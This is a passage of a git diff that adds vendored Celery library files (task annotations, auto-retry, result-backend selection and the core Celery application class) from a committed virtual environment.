monkey-patching task classes +in the configuration. + +This prepares and performs the annotations in the +:setting:`task_annotations` setting. 
+""" +from celery.utils.functional import firstmethod, mlazy +from celery.utils.imports import instantiate + +_first_match = firstmethod('annotate') +_first_match_any = firstmethod('annotate_any') + +__all__ = ('MapAnnotation', 'prepare', 'resolve_all') + + +class MapAnnotation(dict): + """Annotation map: task_name => attributes.""" + + def annotate_any(self): + try: + return dict(self['*']) + except KeyError: + pass + + def annotate(self, task): + try: + return dict(self[task.name]) + except KeyError: + pass + + +def prepare(annotations): + """Expand the :setting:`task_annotations` setting.""" + def expand_annotation(annotation): + if isinstance(annotation, dict): + return MapAnnotation(annotation) + elif isinstance(annotation, str): + return mlazy(instantiate, annotation) + return annotation + + if annotations is None: + return () + elif not isinstance(annotations, (list, tuple)): + annotations = (annotations,) + return [expand_annotation(anno) for anno in annotations] + + +def resolve_all(anno, task): + """Resolve all pending annotations.""" + return (x for x in (_first_match(anno, task), _first_match_any(anno)) if x) diff --git a/env/Lib/site-packages/celery/app/autoretry.py b/env/Lib/site-packages/celery/app/autoretry.py new file mode 100644 index 00000000..80bd81f5 --- /dev/null +++ b/env/Lib/site-packages/celery/app/autoretry.py @@ -0,0 +1,66 @@ +"""Tasks auto-retry functionality.""" +from vine.utils import wraps + +from celery.exceptions import Ignore, Retry +from celery.utils.time import get_exponential_backoff_interval + + +def add_autoretry_behaviour(task, **options): + """Wrap task's `run` method with auto-retry functionality.""" + autoretry_for = tuple( + options.get('autoretry_for', + getattr(task, 'autoretry_for', ())) + ) + dont_autoretry_for = tuple( + options.get('dont_autoretry_for', + getattr(task, 'dont_autoretry_for', ())) + ) + retry_kwargs = options.get( + 'retry_kwargs', getattr(task, 'retry_kwargs', {}) + ) + retry_backoff = float( + options.get('retry_backoff', + getattr(task, 'retry_backoff', False)) + ) + retry_backoff_max = int( + options.get('retry_backoff_max', + getattr(task, 'retry_backoff_max', 600)) + ) + retry_jitter = options.get( + 'retry_jitter', getattr(task, 'retry_jitter', True) + ) + + if autoretry_for and not hasattr(task, '_orig_run'): + + @wraps(task.run) + def run(*args, **kwargs): + try: + return task._orig_run(*args, **kwargs) + except Ignore: + # If Ignore signal occurs task shouldn't be retried, + # even if it suits autoretry_for list + raise + except Retry: + raise + except dont_autoretry_for: + raise + except autoretry_for as exc: + if retry_backoff: + retry_kwargs['countdown'] = \ + get_exponential_backoff_interval( + factor=int(max(1.0, retry_backoff)), + retries=task.request.retries, + maximum=retry_backoff_max, + full_jitter=retry_jitter) + # Override max_retries + if hasattr(task, 'override_max_retries'): + retry_kwargs['max_retries'] = getattr(task, + 'override_max_retries', + task.max_retries) + ret = task.retry(exc=exc, **retry_kwargs) + # Stop propagation + if hasattr(task, 'override_max_retries'): + delattr(task, 'override_max_retries') + raise ret + + task._orig_run, task.run = task.run, run diff --git a/env/Lib/site-packages/celery/app/backends.py b/env/Lib/site-packages/celery/app/backends.py new file mode 100644 index 00000000..5481528f --- /dev/null +++ b/env/Lib/site-packages/celery/app/backends.py @@ -0,0 +1,68 @@ +"""Backend selection.""" +import sys +import types + +from celery._state import current_app +from 
celery.exceptions import ImproperlyConfigured, reraise +from celery.utils.imports import load_extension_class_names, symbol_by_name + +__all__ = ('by_name', 'by_url') + +UNKNOWN_BACKEND = """ +Unknown result backend: {0!r}. Did you spell that correctly? ({1!r}) +""" + +BACKEND_ALIASES = { + 'rpc': 'celery.backends.rpc.RPCBackend', + 'cache': 'celery.backends.cache:CacheBackend', + 'redis': 'celery.backends.redis:RedisBackend', + 'rediss': 'celery.backends.redis:RedisBackend', + 'sentinel': 'celery.backends.redis:SentinelBackend', + 'mongodb': 'celery.backends.mongodb:MongoBackend', + 'db': 'celery.backends.database:DatabaseBackend', + 'database': 'celery.backends.database:DatabaseBackend', + 'elasticsearch': 'celery.backends.elasticsearch:ElasticsearchBackend', + 'cassandra': 'celery.backends.cassandra:CassandraBackend', + 'couchbase': 'celery.backends.couchbase:CouchbaseBackend', + 'couchdb': 'celery.backends.couchdb:CouchBackend', + 'cosmosdbsql': 'celery.backends.cosmosdbsql:CosmosDBSQLBackend', + 'riak': 'celery.backends.riak:RiakBackend', + 'file': 'celery.backends.filesystem:FilesystemBackend', + 'disabled': 'celery.backends.base:DisabledBackend', + 'consul': 'celery.backends.consul:ConsulBackend', + 'dynamodb': 'celery.backends.dynamodb:DynamoDBBackend', + 'azureblockblob': 'celery.backends.azureblockblob:AzureBlockBlobBackend', + 'arangodb': 'celery.backends.arangodb:ArangoDbBackend', + 's3': 'celery.backends.s3:S3Backend', +} + + +def by_name(backend=None, loader=None, + extension_namespace='celery.result_backends'): + """Get backend class by name/alias.""" + backend = backend or 'disabled' + loader = loader or current_app.loader + aliases = dict(BACKEND_ALIASES, **loader.override_backends) + aliases.update(load_extension_class_names(extension_namespace)) + try: + cls = symbol_by_name(backend, aliases) + except ValueError as exc: + reraise(ImproperlyConfigured, ImproperlyConfigured( + UNKNOWN_BACKEND.strip().format(backend, exc)), sys.exc_info()[2]) + if isinstance(cls, types.ModuleType): + raise ImproperlyConfigured(UNKNOWN_BACKEND.strip().format( + backend, 'is a Python module, not a backend class.')) + return cls + + +def by_url(backend=None, loader=None): + """Get backend class by URL.""" + url = None + if backend and '://' in backend: + url = backend + scheme, _, _ = url.partition('://') + if '+' in scheme: + backend, url = url.split('+', 1) + else: + backend = scheme + return by_name(backend, loader), url diff --git a/env/Lib/site-packages/celery/app/base.py b/env/Lib/site-packages/celery/app/base.py new file mode 100644 index 00000000..cfd71c62 --- /dev/null +++ b/env/Lib/site-packages/celery/app/base.py @@ -0,0 +1,1366 @@ +"""Actual App instance implementation.""" +import inspect +import os +import sys +import threading +import warnings +from collections import UserDict, defaultdict, deque +from datetime import datetime +from operator import attrgetter + +from click.exceptions import Exit +from kombu import pools +from kombu.clocks import LamportClock +from kombu.common import oid_from +from kombu.utils.compat import register_after_fork +from kombu.utils.objects import cached_property +from kombu.utils.uuid import uuid +from vine import starpromise + +from celery import platforms, signals +from celery._state import (_announce_app_finalized, _deregister_app, _register_app, _set_current_app, _task_stack, + connect_on_app_finalize, get_current_app, get_current_worker_task, set_default_app) +from celery.exceptions import AlwaysEagerIgnored, ImproperlyConfigured +from 
celery.loaders import get_loader_cls +from celery.local import PromiseProxy, maybe_evaluate +from celery.utils import abstract +from celery.utils.collections import AttributeDictMixin +from celery.utils.dispatch import Signal +from celery.utils.functional import first, head_from_fun, maybe_list +from celery.utils.imports import gen_task_name, instantiate, symbol_by_name +from celery.utils.log import get_logger +from celery.utils.objects import FallbackContext, mro_lookup +from celery.utils.time import maybe_make_aware, timezone, to_utc + +# Load all builtin tasks +from . import backends, builtins # noqa +from .annotations import prepare as prepare_annotations +from .autoretry import add_autoretry_behaviour +from .defaults import DEFAULT_SECURITY_DIGEST, find_deprecated_settings +from .registry import TaskRegistry +from .utils import (AppPickler, Settings, _new_key_to_old, _old_key_to_new, _unpickle_app, _unpickle_app_v2, appstr, + bugreport, detect_settings) + +__all__ = ('Celery',) + +logger = get_logger(__name__) + +BUILTIN_FIXUPS = { + 'celery.fixups.django:fixup', +} +USING_EXECV = os.environ.get('FORKED_BY_MULTIPROCESSING') + +ERR_ENVVAR_NOT_SET = """ +The environment variable {0!r} is not set, +and as such the configuration could not be loaded. + +Please set this variable and make sure it points to +a valid configuration module. + +Example: + {0}="proj.celeryconfig" +""" + + +def app_has_custom(app, attr): + """Return true if app has customized method `attr`. + + Note: + This is used for optimizations in cases where we know + how the default behavior works, but need to account + for someone using inheritance to override a method/property. + """ + return mro_lookup(app.__class__, attr, stop={Celery, object}, + monkey_patched=[__name__]) + + +def _unpickle_appattr(reverse_name, args): + """Unpickle app.""" + # Given an attribute name and a list of args, gets + # the attribute from the current app and calls it. + return get_current_app()._rgetattr(reverse_name)(*args) + + +def _after_fork_cleanup_app(app): + # This is used with multiprocessing.register_after_fork, + # so need to be at module level. + try: + app._after_fork() + except Exception as exc: # pylint: disable=broad-except + logger.info('after forker raised exception: %r', exc, exc_info=1) + + +class PendingConfiguration(UserDict, AttributeDictMixin): + # `app.conf` will be of this type before being explicitly configured, + # meaning the app can keep any configuration set directly + # on `app.conf` before the `app.config_from_object` call. + # + # accessing any key will finalize the configuration, + # replacing `app.conf` with a concrete settings object. + + callback = None + _data = None + + def __init__(self, conf, callback): + object.__setattr__(self, '_data', conf) + object.__setattr__(self, 'callback', callback) + + def __setitem__(self, key, value): + self._data[key] = value + + def clear(self): + self._data.clear() + + def update(self, *args, **kwargs): + self._data.update(*args, **kwargs) + + def setdefault(self, *args, **kwargs): + return self._data.setdefault(*args, **kwargs) + + def __contains__(self, key): + # XXX will not show finalized configuration + # setdefault will cause `key in d` to happen, + # so for setdefault to be lazy, so does contains. + return key in self._data + + def __len__(self): + return len(self.data) + + def __repr__(self): + return repr(self.data) + + @cached_property + def data(self): + return self.callback() + + +class Celery: + """Celery application. 
+ + Arguments: + main (str): Name of the main module if running as `__main__`. + This is used as the prefix for auto-generated task names. + + Keyword Arguments: + broker (str): URL of the default broker used. + backend (Union[str, Type[celery.backends.base.Backend]]): + The result store backend class, or the name of the backend + class to use. + + Default is the value of the :setting:`result_backend` setting. + autofinalize (bool): If set to False a :exc:`RuntimeError` + will be raised if the task registry or tasks are used before + the app is finalized. + set_as_current (bool): Make this the global current app. + include (List[str]): List of modules every worker should import. + + amqp (Union[str, Type[AMQP]]): AMQP object or class name. + events (Union[str, Type[celery.app.events.Events]]): Events object or + class name. + log (Union[str, Type[Logging]]): Log object or class name. + control (Union[str, Type[celery.app.control.Control]]): Control object + or class name. + tasks (Union[str, Type[TaskRegistry]]): A task registry, or the name of + a registry class. + fixups (List[str]): List of fix-up plug-ins (e.g., see + :mod:`celery.fixups.django`). + config_source (Union[str, class]): Take configuration from a class, + or object. Attributes may include any settings described in + the documentation. + task_cls (Union[str, Type[celery.app.task.Task]]): base task class to + use. See :ref:`this section ` for usage. + """ + + #: This is deprecated, use :meth:`reduce_keys` instead + Pickler = AppPickler + + SYSTEM = platforms.SYSTEM + IS_macOS, IS_WINDOWS = platforms.IS_macOS, platforms.IS_WINDOWS + + #: Name of the `__main__` module. Required for standalone scripts. + #: + #: If set this will be used instead of `__main__` when automatically + #: generating task names. + main = None + + #: Custom options for command-line programs. + #: See :ref:`extending-commandoptions` + user_options = None + + #: Custom bootsteps to extend and modify the worker. + #: See :ref:`extending-bootsteps`. + steps = None + + builtin_fixups = BUILTIN_FIXUPS + + amqp_cls = 'celery.app.amqp:AMQP' + backend_cls = None + events_cls = 'celery.app.events:Events' + loader_cls = None + log_cls = 'celery.app.log:Logging' + control_cls = 'celery.app.control:Control' + task_cls = 'celery.app.task:Task' + registry_cls = 'celery.app.registry:TaskRegistry' + + #: Thread local storage. + _local = None + _fixups = None + _pool = None + _conf = None + _after_fork_registered = False + + #: Signal sent when app is loading configuration. + on_configure = None + + #: Signal sent after app has prepared the configuration. + on_after_configure = None + + #: Signal sent after app has been finalized. + on_after_finalize = None + + #: Signal sent by every new process after fork. 
+ on_after_fork = None + + def __init__(self, main=None, loader=None, backend=None, + amqp=None, events=None, log=None, control=None, + set_as_current=True, tasks=None, broker=None, include=None, + changes=None, config_source=None, fixups=None, task_cls=None, + autofinalize=True, namespace=None, strict_typing=True, + **kwargs): + + self._local = threading.local() + self._backend_cache = None + + self.clock = LamportClock() + self.main = main + self.amqp_cls = amqp or self.amqp_cls + self.events_cls = events or self.events_cls + self.loader_cls = loader or self._get_default_loader() + self.log_cls = log or self.log_cls + self.control_cls = control or self.control_cls + self.task_cls = task_cls or self.task_cls + self.set_as_current = set_as_current + self.registry_cls = symbol_by_name(self.registry_cls) + self.user_options = defaultdict(set) + self.steps = defaultdict(set) + self.autofinalize = autofinalize + self.namespace = namespace + self.strict_typing = strict_typing + + self.configured = False + self._config_source = config_source + self._pending_defaults = deque() + self._pending_periodic_tasks = deque() + + self.finalized = False + self._finalize_mutex = threading.RLock() + self._pending = deque() + self._tasks = tasks + if not isinstance(self._tasks, TaskRegistry): + self._tasks = self.registry_cls(self._tasks or {}) + + # If the class defines a custom __reduce_args__ we need to use + # the old way of pickling apps: pickling a list of + # args instead of the new way that pickles a dict of keywords. + self._using_v1_reduce = app_has_custom(self, '__reduce_args__') + + # these options are moved to the config to + # simplify pickling of the app object. + self._preconf = changes or {} + self._preconf_set_by_auto = set() + self.__autoset('broker_url', broker) + self.__autoset('result_backend', backend) + self.__autoset('include', include) + + for key, value in kwargs.items(): + self.__autoset(key, value) + + self._conf = Settings( + PendingConfiguration( + self._preconf, self._finalize_pending_conf), + prefix=self.namespace, + keys=(_old_key_to_new, _new_key_to_old), + ) + + # - Apply fix-ups. + self.fixups = set(self.builtin_fixups) if fixups is None else fixups + # ...store fixup instances in _fixups to keep weakrefs alive. + self._fixups = [symbol_by_name(fixup)(self) for fixup in self.fixups] + + if self.set_as_current: + self.set_current() + + # Signals + if self.on_configure is None: + # used to be a method pre 4.0 + self.on_configure = Signal(name='app.on_configure') + self.on_after_configure = Signal( + name='app.on_after_configure', + providing_args={'source'}, + ) + self.on_after_finalize = Signal(name='app.on_after_finalize') + self.on_after_fork = Signal(name='app.on_after_fork') + + # Boolean signalling, whether fast_trace_task are enabled. + # this attribute is set in celery.worker.trace and checked by celery.worker.request + self.use_fast_trace_task = False + + self.on_init() + _register_app(self) + + def _get_default_loader(self): + # the --loader command-line argument sets the environment variable. 
+ return ( + os.environ.get('CELERY_LOADER') or + self.loader_cls or + 'celery.loaders.app:AppLoader' + ) + + def on_init(self): + """Optional callback called at init.""" + + def __autoset(self, key, value): + if value is not None: + self._preconf[key] = value + self._preconf_set_by_auto.add(key) + + def set_current(self): + """Make this the current app for this thread.""" + _set_current_app(self) + + def set_default(self): + """Make this the default app for all threads.""" + set_default_app(self) + + def _ensure_after_fork(self): + if not self._after_fork_registered: + self._after_fork_registered = True + if register_after_fork is not None: + register_after_fork(self, _after_fork_cleanup_app) + + def close(self): + """Clean up after the application. + + Only necessary for dynamically created apps, and you should + probably use the :keyword:`with` statement instead. + + Example: + >>> with Celery(set_as_current=False) as app: + ... with app.connection_for_write() as conn: + ... pass + """ + self._pool = None + _deregister_app(self) + + def start(self, argv=None): + """Run :program:`celery` using `argv`. + + Uses :data:`sys.argv` if `argv` is not specified. + """ + from celery.bin.celery import celery + + celery.params[0].default = self + + if argv is None: + argv = sys.argv + + try: + celery.main(args=argv, standalone_mode=False) + except Exit as e: + return e.exit_code + finally: + celery.params[0].default = None + + def worker_main(self, argv=None): + """Run :program:`celery worker` using `argv`. + + Uses :data:`sys.argv` if `argv` is not specified. + """ + if argv is None: + argv = sys.argv + + if 'worker' not in argv: + raise ValueError( + "The worker sub-command must be specified in argv.\n" + "Use app.start() to programmatically start other commands." + ) + + self.start(argv=argv) + + def task(self, *args, **opts): + """Decorator to create a task class out of any callable. + + See :ref:`Task options` for a list of the + arguments that can be passed to this decorator. + + Examples: + .. code-block:: python + + @app.task + def refresh_feed(url): + store_feed(feedparser.parse(url)) + + with setting extra options: + + .. code-block:: python + + @app.task(exchange='feeds') + def refresh_feed(url): + return store_feed(feedparser.parse(url)) + + Note: + App Binding: For custom apps the task decorator will return + a proxy object, so that the act of creating the task is not + performed until the task is used or the task registry is accessed. + + If you're depending on binding to be deferred, then you must + not access any attributes on the returned object until the + application is fully set up (finalized). + """ + if USING_EXECV and opts.get('lazy', True): + # When using execv the task in the original module will point to a + # different app, so doing things like 'add.request' will point to + # a different task instance. This makes sure it will always use + # the task instance from the current app. + # Really need a better solution for this :( + from . 
import shared_task + return shared_task(*args, lazy=False, **opts) + + def inner_create_task_cls(shared=True, filter=None, lazy=True, **opts): + _filt = filter + + def _create_task_cls(fun): + if shared: + def cons(app): + return app._task_from_fun(fun, **opts) + cons.__name__ = fun.__name__ + connect_on_app_finalize(cons) + if not lazy or self.finalized: + ret = self._task_from_fun(fun, **opts) + else: + # return a proxy object that evaluates on first use + ret = PromiseProxy(self._task_from_fun, (fun,), opts, + __doc__=fun.__doc__) + self._pending.append(ret) + if _filt: + return _filt(ret) + return ret + + return _create_task_cls + + if len(args) == 1: + if callable(args[0]): + return inner_create_task_cls(**opts)(*args) + raise TypeError('argument 1 to @task() must be a callable') + if args: + raise TypeError( + '@task() takes exactly 1 argument ({} given)'.format( + sum([len(args), len(opts)]))) + return inner_create_task_cls(**opts) + + def type_checker(self, fun, bound=False): + return staticmethod(head_from_fun(fun, bound=bound)) + + def _task_from_fun(self, fun, name=None, base=None, bind=False, **options): + if not self.finalized and not self.autofinalize: + raise RuntimeError('Contract breach: app not finalized') + name = name or self.gen_task_name(fun.__name__, fun.__module__) + base = base or self.Task + + if name not in self._tasks: + run = fun if bind else staticmethod(fun) + task = type(fun.__name__, (base,), dict({ + 'app': self, + 'name': name, + 'run': run, + '_decorated': True, + '__doc__': fun.__doc__, + '__module__': fun.__module__, + '__annotations__': fun.__annotations__, + '__header__': self.type_checker(fun, bound=bind), + '__wrapped__': run}, **options))() + # for some reason __qualname__ cannot be set in type() + # so we have to set it here. + try: + task.__qualname__ = fun.__qualname__ + except AttributeError: + pass + self._tasks[task.name] = task + task.bind(self) # connects task to this app + add_autoretry_behaviour(task, **options) + else: + task = self._tasks[name] + return task + + def register_task(self, task, **options): + """Utility for registering a task-based class. + + Note: + This is here for compatibility with old Celery 1.0 + style task classes, you should not need to use this for + new projects. + """ + task = inspect.isclass(task) and task() or task + if not task.name: + task_cls = type(task) + task.name = self.gen_task_name( + task_cls.__name__, task_cls.__module__) + add_autoretry_behaviour(task, **options) + self.tasks[task.name] = task + task._app = self + task.bind(self) + return task + + def gen_task_name(self, name, module): + return gen_task_name(self, name, module) + + def finalize(self, auto=False): + """Finalize the app. + + This loads built-in tasks, evaluates pending task decorators, + reads configuration, etc. + """ + with self._finalize_mutex: + if not self.finalized: + if auto and not self.autofinalize: + raise RuntimeError('Contract breach: app not finalized') + self.finalized = True + _announce_app_finalized(self) + + pending = self._pending + while pending: + maybe_evaluate(pending.popleft()) + + for task in self._tasks.values(): + task.bind(self) + + self.on_after_finalize.send(sender=self) + + def add_defaults(self, fun): + """Add default configuration from dict ``d``. + + If the argument is a callable function then it will be regarded + as a promise, and it won't be loaded until the configuration is + actually needed. + + This method can be compared to: + + .. 
code-block:: pycon + + >>> celery.conf.update(d) + + with a difference that 1) no copy will be made and 2) the dict will + not be transferred when the worker spawns child processes, so + it's important that the same configuration happens at import time + when pickle restores the object on the other side. + """ + if not callable(fun): + d, fun = fun, lambda: d + if self.configured: + return self._conf.add_defaults(fun()) + self._pending_defaults.append(fun) + + def config_from_object(self, obj, + silent=False, force=False, namespace=None): + """Read configuration from object. + + Object is either an actual object or the name of a module to import. + + Example: + >>> celery.config_from_object('myapp.celeryconfig') + + >>> from myapp import celeryconfig + >>> celery.config_from_object(celeryconfig) + + Arguments: + silent (bool): If true then import errors will be ignored. + force (bool): Force reading configuration immediately. + By default the configuration will be read only when required. + """ + self._config_source = obj + self.namespace = namespace or self.namespace + if force or self.configured: + self._conf = None + if self.loader.config_from_object(obj, silent=silent): + return self.conf + + def config_from_envvar(self, variable_name, silent=False, force=False): + """Read configuration from environment variable. + + The value of the environment variable must be the name + of a module to import. + + Example: + >>> os.environ['CELERY_CONFIG_MODULE'] = 'myapp.celeryconfig' + >>> celery.config_from_envvar('CELERY_CONFIG_MODULE') + """ + module_name = os.environ.get(variable_name) + if not module_name: + if silent: + return False + raise ImproperlyConfigured( + ERR_ENVVAR_NOT_SET.strip().format(variable_name)) + return self.config_from_object(module_name, silent=silent, force=force) + + def config_from_cmdline(self, argv, namespace='celery'): + self._conf.update( + self.loader.cmdline_config_parser(argv, namespace) + ) + + def setup_security(self, allowed_serializers=None, key=None, key_password=None, cert=None, + store=None, digest=DEFAULT_SECURITY_DIGEST, + serializer='json'): + """Setup the message-signing serializer. + + This will affect all application instances (a global operation). + + Disables untrusted serializers and if configured to use the ``auth`` + serializer will register the ``auth`` serializer with the provided + settings into the Kombu serializer registry. + + Arguments: + allowed_serializers (Set[str]): List of serializer names, or + content_types that should be exempt from being disabled. + key (str): Name of private key file to use. + Defaults to the :setting:`security_key` setting. + key_password (bytes): Password to decrypt the private key. + Defaults to the :setting:`security_key_password` setting. + cert (str): Name of certificate file to use. + Defaults to the :setting:`security_certificate` setting. + store (str): Directory containing certificates. + Defaults to the :setting:`security_cert_store` setting. + digest (str): Digest algorithm used when signing messages. + Default is ``sha256``. + serializer (str): Serializer used to encode messages after + they've been signed. See :setting:`task_serializer` for + the serializers supported. Default is ``json``. + """ + from celery.security import setup_security + return setup_security(allowed_serializers, key, key_password, cert, + store, digest, serializer, app=self) + + def autodiscover_tasks(self, packages=None, + related_name='tasks', force=False): + """Auto-discover task modules. 
+ + Searches a list of packages for a "tasks.py" module (or use + related_name argument). + + If the name is empty, this will be delegated to fix-ups (e.g., Django). + + For example if you have a directory layout like this: + + .. code-block:: text + + foo/__init__.py + tasks.py + models.py + + bar/__init__.py + tasks.py + models.py + + baz/__init__.py + models.py + + Then calling ``app.autodiscover_tasks(['foo', 'bar', 'baz'])`` will + result in the modules ``foo.tasks`` and ``bar.tasks`` being imported. + + Arguments: + packages (List[str]): List of packages to search. + This argument may also be a callable, in which case the + value returned is used (for lazy evaluation). + related_name (Optional[str]): The name of the module to find. Defaults + to "tasks": meaning "look for 'module.tasks' for every + module in ``packages``.". If ``None`` will only try to import + the package, i.e. "look for 'module'". + force (bool): By default this call is lazy so that the actual + auto-discovery won't happen until an application imports + the default modules. Forcing will cause the auto-discovery + to happen immediately. + """ + if force: + return self._autodiscover_tasks(packages, related_name) + signals.import_modules.connect(starpromise( + self._autodiscover_tasks, packages, related_name, + ), weak=False, sender=self) + + def _autodiscover_tasks(self, packages, related_name, **kwargs): + if packages: + return self._autodiscover_tasks_from_names(packages, related_name) + return self._autodiscover_tasks_from_fixups(related_name) + + def _autodiscover_tasks_from_names(self, packages, related_name): + # packages argument can be lazy + return self.loader.autodiscover_tasks( + packages() if callable(packages) else packages, related_name, + ) + + def _autodiscover_tasks_from_fixups(self, related_name): + return self._autodiscover_tasks_from_names([ + pkg for fixup in self._fixups + if hasattr(fixup, 'autodiscover_tasks') + for pkg in fixup.autodiscover_tasks() + ], related_name=related_name) + + def send_task(self, name, args=None, kwargs=None, countdown=None, + eta=None, task_id=None, producer=None, connection=None, + router=None, result_cls=None, expires=None, + publisher=None, link=None, link_error=None, + add_to_parent=True, group_id=None, group_index=None, + retries=0, chord=None, + reply_to=None, time_limit=None, soft_time_limit=None, + root_id=None, parent_id=None, route_name=None, + shadow=None, chain=None, task_type=None, **options): + """Send task by name. + + Supports the same arguments as :meth:`@-Task.apply_async`. + + Arguments: + name (str): Name of task to call (e.g., `"tasks.add"`). + result_cls (AsyncResult): Specify custom result class. 
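+
+        Example:
+            An illustrative call, reusing the placeholder task name
+            ``"tasks.add"`` from above (not a task defined in this module):
+
+            >>> result = app.send_task('tasks.add', args=(2, 2), countdown=10)
+            >>> result.get(timeout=30)
+            4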
+ """ + parent = have_parent = None + amqp = self.amqp + task_id = task_id or uuid() + producer = producer or publisher # XXX compat + router = router or amqp.router + conf = self.conf + if conf.task_always_eager: # pragma: no cover + warnings.warn(AlwaysEagerIgnored( + 'task_always_eager has no effect on send_task', + ), stacklevel=2) + + ignore_result = options.pop('ignore_result', False) + options = router.route( + options, route_name or name, args, kwargs, task_type) + if expires is not None: + if isinstance(expires, datetime): + expires_s = (maybe_make_aware( + expires) - self.now()).total_seconds() + elif isinstance(expires, str): + expires_s = (maybe_make_aware( + datetime.fromisoformat(expires)) - self.now()).total_seconds() + else: + expires_s = expires + + if expires_s < 0: + logger.warning( + f"{task_id} has an expiration date in the past ({-expires_s}s ago).\n" + "We assume this is intended and so we have set the " + "expiration date to 0 instead.\n" + "According to RabbitMQ's documentation:\n" + "\"Setting the TTL to 0 causes messages to be expired upon " + "reaching a queue unless they can be delivered to a " + "consumer immediately.\"\n" + "If this was unintended, please check the code which " + "published this task." + ) + expires_s = 0 + + options["expiration"] = expires_s + + if not root_id or not parent_id: + parent = self.current_worker_task + if parent: + if not root_id: + root_id = parent.request.root_id or parent.request.id + if not parent_id: + parent_id = parent.request.id + + if conf.task_inherit_parent_priority: + options.setdefault('priority', + parent.request.delivery_info.get('priority')) + + # alias for 'task_as_v2' + message = amqp.create_task_message( + task_id, name, args, kwargs, countdown, eta, group_id, group_index, + expires, retries, chord, + maybe_list(link), maybe_list(link_error), + reply_to or self.thread_oid, time_limit, soft_time_limit, + self.conf.task_send_sent_event, + root_id, parent_id, shadow, chain, + ignore_result=ignore_result, + **options + ) + + stamped_headers = options.pop('stamped_headers', []) + for stamp in stamped_headers: + options.pop(stamp) + + if connection: + producer = amqp.Producer(connection, auto_declare=False) + + with self.producer_or_acquire(producer) as P: + with P.connection._reraise_as_library_errors(): + if not ignore_result: + self.backend.on_task_call(P, task_id) + amqp.send_task_message(P, name, message, **options) + result = (result_cls or self.AsyncResult)(task_id) + # We avoid using the constructor since a custom result class + # can be used, in which case the constructor may still use + # the old signature. + result.ignored = ignore_result + + if add_to_parent: + if not have_parent: + parent, have_parent = self.current_worker_task, True + if parent: + parent.add_trail(result) + return result + + def connection_for_read(self, url=None, **kwargs): + """Establish connection used for consuming. + + See Also: + :meth:`connection` for supported arguments. + """ + return self._connection(url or self.conf.broker_read_url, **kwargs) + + def connection_for_write(self, url=None, **kwargs): + """Establish connection used for producing. + + See Also: + :meth:`connection` for supported arguments. 
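+
+        Example:
+            Mirroring the usage shown in :meth:`close`; ``ensure_connection``
+            is standard :class:`kombu.Connection` API:
+
+            >>> with app.connection_for_write() as conn:
+            ...     conn.ensure_connection()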
+ """ + return self._connection(url or self.conf.broker_write_url, **kwargs) + + def connection(self, hostname=None, userid=None, password=None, + virtual_host=None, port=None, ssl=None, + connect_timeout=None, transport=None, + transport_options=None, heartbeat=None, + login_method=None, failover_strategy=None, **kwargs): + """Establish a connection to the message broker. + + Please use :meth:`connection_for_read` and + :meth:`connection_for_write` instead, to convey the intent + of use for this connection. + + Arguments: + url: Either the URL or the hostname of the broker to use. + hostname (str): URL, Hostname/IP-address of the broker. + If a URL is used, then the other argument below will + be taken from the URL instead. + userid (str): Username to authenticate as. + password (str): Password to authenticate with + virtual_host (str): Virtual host to use (domain). + port (int): Port to connect to. + ssl (bool, Dict): Defaults to the :setting:`broker_use_ssl` + setting. + transport (str): defaults to the :setting:`broker_transport` + setting. + transport_options (Dict): Dictionary of transport specific options. + heartbeat (int): AMQP Heartbeat in seconds (``pyamqp`` only). + login_method (str): Custom login method to use (AMQP only). + failover_strategy (str, Callable): Custom failover strategy. + **kwargs: Additional arguments to :class:`kombu.Connection`. + + Returns: + kombu.Connection: the lazy connection instance. + """ + return self.connection_for_write( + hostname or self.conf.broker_write_url, + userid=userid, password=password, + virtual_host=virtual_host, port=port, ssl=ssl, + connect_timeout=connect_timeout, transport=transport, + transport_options=transport_options, heartbeat=heartbeat, + login_method=login_method, failover_strategy=failover_strategy, + **kwargs + ) + + def _connection(self, url, userid=None, password=None, + virtual_host=None, port=None, ssl=None, + connect_timeout=None, transport=None, + transport_options=None, heartbeat=None, + login_method=None, failover_strategy=None, **kwargs): + conf = self.conf + return self.amqp.Connection( + url, + userid or conf.broker_user, + password or conf.broker_password, + virtual_host or conf.broker_vhost, + port or conf.broker_port, + transport=transport or conf.broker_transport, + ssl=self.either('broker_use_ssl', ssl), + heartbeat=heartbeat, + login_method=login_method or conf.broker_login_method, + failover_strategy=( + failover_strategy or conf.broker_failover_strategy + ), + transport_options=dict( + conf.broker_transport_options, **transport_options or {} + ), + connect_timeout=self.either( + 'broker_connection_timeout', connect_timeout + ), + ) + broker_connection = connection + + def _acquire_connection(self, pool=True): + """Helper for :meth:`connection_or_acquire`.""" + if pool: + return self.pool.acquire(block=True) + return self.connection_for_write() + + def connection_or_acquire(self, connection=None, pool=True, *_, **__): + """Context used to acquire a connection from the pool. + + For use within a :keyword:`with` statement to get a connection + from the pool if one is not already provided. + + Arguments: + connection (kombu.Connection): If not provided, a connection + will be acquired from the connection pool. + """ + return FallbackContext(connection, self._acquire_connection, pool=pool) + default_connection = connection_or_acquire # XXX compat + + def producer_or_acquire(self, producer=None): + """Context used to acquire a producer from the pool. 
+ + For use within a :keyword:`with` statement to get a producer + from the pool if one is not already provided + + Arguments: + producer (kombu.Producer): If not provided, a producer + will be acquired from the producer pool. + """ + return FallbackContext( + producer, self.producer_pool.acquire, block=True, + ) + default_producer = producer_or_acquire # XXX compat + + def prepare_config(self, c): + """Prepare configuration before it is merged with the defaults.""" + return find_deprecated_settings(c) + + def now(self): + """Return the current time and date as a datetime.""" + now_in_utc = to_utc(datetime.utcnow()) + return now_in_utc.astimezone(self.timezone) + + def select_queues(self, queues=None): + """Select subset of queues. + + Arguments: + queues (Sequence[str]): a list of queue names to keep. + """ + return self.amqp.queues.select(queues) + + def either(self, default_key, *defaults): + """Get key from configuration or use default values. + + Fallback to the value of a configuration key if none of the + `*values` are true. + """ + return first(None, [ + first(None, defaults), starpromise(self.conf.get, default_key), + ]) + + def bugreport(self): + """Return information useful in bug reports.""" + return bugreport(self) + + def _get_backend(self): + backend, url = backends.by_url( + self.backend_cls or self.conf.result_backend, + self.loader) + return backend(app=self, url=url) + + def _finalize_pending_conf(self): + """Get config value by key and finalize loading the configuration. + + Note: + This is used by PendingConfiguration: + as soon as you access a key the configuration is read. + """ + conf = self._conf = self._load_config() + return conf + + def _load_config(self): + if isinstance(self.on_configure, Signal): + self.on_configure.send(sender=self) + else: + # used to be a method pre 4.0 + self.on_configure() + if self._config_source: + self.loader.config_from_object(self._config_source) + self.configured = True + settings = detect_settings( + self.prepare_config(self.loader.conf), self._preconf, + 